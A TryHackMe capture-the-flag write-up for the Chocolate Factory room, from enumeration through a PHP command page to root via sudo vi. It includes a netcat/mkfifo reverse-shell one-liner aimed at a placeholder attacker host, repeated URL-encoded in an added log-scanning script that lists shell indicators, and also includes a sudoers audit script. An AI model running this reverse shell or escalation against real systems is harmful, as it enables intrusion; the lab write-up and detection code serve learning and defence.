TryHackMe write-up: Chocolate Factory


This is my write-up for TryHackMe’s Chocolate Factory room.


Using nmap, I found that this box had several ports open.

Checking the webpage, I found what looked like a login page.

Running nmap’s service enumeration option, I saw something interesting for port 113.

It turns out that a file named key_rev_key is being hosted on the web site. After downloading it and opening it in Ghidra, I was able to read the code and find the key being asked for.

Running dirb, I found a php page.

From my browser, I checked the php page. It looked like it was used to execute commands!


I sent the command “ls -lhtra” to see if this page would run simple commands.

I then tried sending the following command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Attacker IP] [Attacker port] >/tmp/f

I then checked my netcat listener, and found a connection from the target.
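The two requests above (a harmless directory listing, then a netcat reverse shell) leave a clear trace in the web server's access log, because the whole command travels in the query string. The following detection script is an added example and is not part of the original write-up or the room: it parses combined-format access log lines, URL-decodes every query parameter, and flags the ones that carry shell indicators. The log lines, the page path /example.php, the parameter name cmd and the IP addresses are all constructed for the example; the room's real page name is not given in the write-up.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format: client - - [timestamp] "METHOD /target HTTP/x.y" status bytes ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Tokens that, inside a decoded request parameter, show an OS command is being
# passed through the web application (the same pattern the write-up uses).
SHELL_INDICATORS = (
    "mkfifo",     # named pipe wiring a shell to a socket
    "/bin/sh",
    "/bin/bash",
    "nc ",        # netcat invocation
    "2>&1",       # stderr redirection, rare in legitimate form input
)
SHELL_METACHARS = re.compile(r"[;|&`]")
COMMON_COMMANDS = re.compile(r"\b(ls|cat|rm|id|whoami|uname)\b")
# Parameter names that by themselves suggest a command-execution page.
SUSPICIOUS_PARAMS = {"cmd", "command", "exec", "run", "shell"}

# Constructed sample log (placeholder path, parameter and addresses; not from the room).
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2022:10:01:02 +0000] "GET /example.php?cmd=ls+-lhtra HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2022:10:01:40 +0000] "GET /example.php?cmd=rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+10.0.0.5+4444+%3E%2Ftmp%2Ff HTTP/1.1" 200 0 "-" "curl/7.68.0"
10.0.0.9 - - [12/May/2022:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2022:10:02:30 +0000] "POST /validate.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def classify_value(value: str) -> list:
    """Return the indicators matched by one URL-decoded parameter value."""
    hits = [tok for tok in SHELL_INDICATORS if tok in value]
    # A chained command such as "ls; id" has no single signature token but is still
    # a command string, so score metacharacter + known command as a weaker hit.
    if SHELL_METACHARS.search(value) and COMMON_COMMANDS.search(value):
        hits.append("metachar+command")
    return hits


def scan_access_log(log_text: str) -> list:
    """Scan log lines and return one finding per suspicious query parameter."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(m.group("target")).query
        # parse_qsl undoes percent-encoding and '+' for us, so the raw command reappears.
        for name, value in parse_qsl(query, keep_blank_values=True):
            hits = classify_value(value)
            if any(h != "metachar+command" for h in hits):
                severity = "high"      # a recognised reverse-shell / shell-binary token
            elif hits or name.lower() in SUSPICIOUS_PARAMS:
                severity = "medium"    # command-like parameter, no strong signature
            else:
                continue
            findings.append({
                "line": lineno,
                "client": m.group("client"),
                "param": name,
                "decoded": value,
                "indicators": hits,
                "severity": severity,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['severity']:6} {f['client']} {f['param']}={f['decoded']!r} {f['indicators']}")
```

Only GET parameters are visible in a standard access log; a POST body such as the one sent to validate.php is not logged, so the same indicators would have to be applied at the application or WAF layer for form submissions.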

Checking the contents of the directory, I found another php file containing a possible set of credentials.

Trying to run su or ssh as this user proved futile. It seems that I needed to escalate privileges another way.

Privilege Escalation

Checking out charlie’s home directory showed what looked like an ssh private key.

Downloading the private key, I was able to connect to the target via ssh as charlie.

Checking for sudo privileges, I found that the user charlie can execute vi as root. GTFOBins has a lot of examples showing how to root using vi.
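A sudo rule that grants an editor as root is equivalent to granting root, which is what the write-up exploits here. The audit script below is an added example, not part of the original write-up or the room: it parses sudoers-style rules, tracks the NOPASSWD/NOEXEC tags, and reports commands that hand the caller a root shell or let them write any file as root, with the fix a defender would apply (sudoedit for editors, NOEXEC or argument restriction for the rest). The sudoers lines are constructed sample input; the user charlie and the vi entry mirror the situation described above, the other users and paths are placeholders.

```python
import os
import re

# Tags from sudoers(5) that may precede a command in a Cmnd_Spec.
KNOWN_TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
              "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT"}

# Editors: even under NOEXEC they can write any file as root (e.g. the sudoers
# file itself), so the correct fix is sudoedit, not a tag.
EDITORS = {"vi", "vim", "view", "nano", "emacs"}
# Other interactive tools that can spawn a child shell unless NOEXEC applies.
SHELL_CAPABLE = {"less", "more", "man", "find", "awk", "perl", "python", "python3"}

# user  host=(runas) [TAG: ...] command[, command ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)=(?:\((?P<runas>[^)]*)\))?\s*(?P<spec>.+)$"
)
TAG_RE = re.compile(r"([A-Z_]+):\s*")

# Constructed sample (not the room's real sudoers file).
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
charlie ALL=(ALL) NOPASSWD: /usr/bin/vi
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/ /mnt/backup/
deploy  ALL=(root) NOEXEC: /usr/bin/vim /etc/app.conf
"""


def assess(cmd: str, tags: set):
    """Return (severity, advice) for one command spec, or None if it looks safe."""
    if cmd == "ALL":
        return "critical", "any command as the run-as user"
    prog = os.path.basename(cmd.split()[0])
    noexec = "NOEXEC" in tags and "EXEC" not in tags   # EXEC overrides NOEXEC
    if prog in EDITORS:
        if noexec:
            return "medium", "editor can still write arbitrary files as root; replace with sudoedit"
        return "high", "editor can spawn a root shell; replace with sudoedit"
    if prog in SHELL_CAPABLE and not noexec:
        return "high", "program can spawn a root shell; add NOEXEC or restrict arguments"
    return None


def audit_sudoers(text: str) -> list:
    """Parse sudoers-style text and return findings for risky rules."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue                              # aliases, includes, etc. are out of scope here
        tags = set()
        for piece in m.group("spec").split(","):
            cmd = piece.strip()
            # Tags persist for later commands in the same list until overridden.
            while True:
                t = TAG_RE.match(cmd)
                if not t or t.group(1) not in KNOWN_TAGS:
                    break
                tags.add(t.group(1))
                cmd = cmd[t.end():]
            verdict = assess(cmd, tags)
            if verdict:
                severity, advice = verdict
                findings.append({
                    "line": lineno,
                    "user": m.group("user"),
                    "runas": m.group("runas") or m.group("user"),
                    "command": cmd,
                    "tags": sorted(tags),
                    "severity": severity,
                    "advice": advice,
                })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {f['line']} {f['severity']:8} {f['user']:8} {f['command']}  -> {f['advice']}")
```

The parser handles the common one-line rule form only; Cmnd_Alias, User_Alias and @include directives are skipped rather than guessed at, so on a real system run it over the output of visudo -c -f or the expanded sudo -l listing as well.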

Running and then entering the key found in the enumeration phase shows the root flag.




I like breaking stuff.
